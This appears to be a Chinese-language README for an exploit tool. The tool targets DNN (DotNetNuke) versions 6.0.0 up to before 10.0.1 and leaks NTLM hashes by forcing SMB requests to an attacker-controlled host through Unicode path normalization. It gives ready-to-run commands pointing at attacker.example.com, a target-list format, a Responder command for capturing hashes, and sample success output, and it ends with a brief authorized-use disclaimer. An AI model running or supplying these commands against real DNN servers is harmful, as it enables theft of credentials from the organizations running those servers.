此利用工具针对 DNN(原名 DotNetNuke)版本 6.0.0 至 10.0.1 之前版本的漏洞,允许攻击者通过 Unicode 路径规范化攻击泄露 NTLM 哈希。
该利用工具滥用 Windows/.NET 的特殊机制和 Unicode 规范化,强制目标 DNN 服务器向攻击者控制的服务器发起 SMB 请求,从而可能在此过程中的身份验证流程中暴露 NTLM 哈希。
pip install -r requirements.txt 安装)python main.py targets.txt attacker.example.com
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
targets: 包含 DNN 主机列表的文件(每行一个)smb_server: 用于捕获 NTLM 哈希的 SMB 服务器主机名/IP-t, --threads: 并发线程数(默认值:10)--timeout: 请求超时秒数(默认值:10)创建一个文本文件,每行一个目标 URL:
http://target1.example.com
https://target2.example.com:8080
target3.example.com
你可以使用诸如 Responder 之类的工具来捕获 NTLM 哈希:
responder -I eth0 -wrf
或使用 Burp Collaborator 进行带外检测。
[2025-01-XX-XX:XX:XX] [INFO] 针对 5 个目标启动 DNN NTLM 哈希泄露利用
[2025-01-XX-XX:XX:XX] [INFO] SMB 服务器: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] 检测到 DNN 标识: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] 文件上传端点可访问
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] 利用载荷已成功发送
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] 请检查你的 SMB 服务器,查看是否有传入的 NTLM 身份验证尝试
该利用工具会查找以下 DNN 标识:
dnn_IsMobile cookiedotnetnukednnconnectDNN Platform本工具仅用于教育和授权安全测试目的。请负责任地使用,并仅在你拥有或明确允许测试的系统上使用。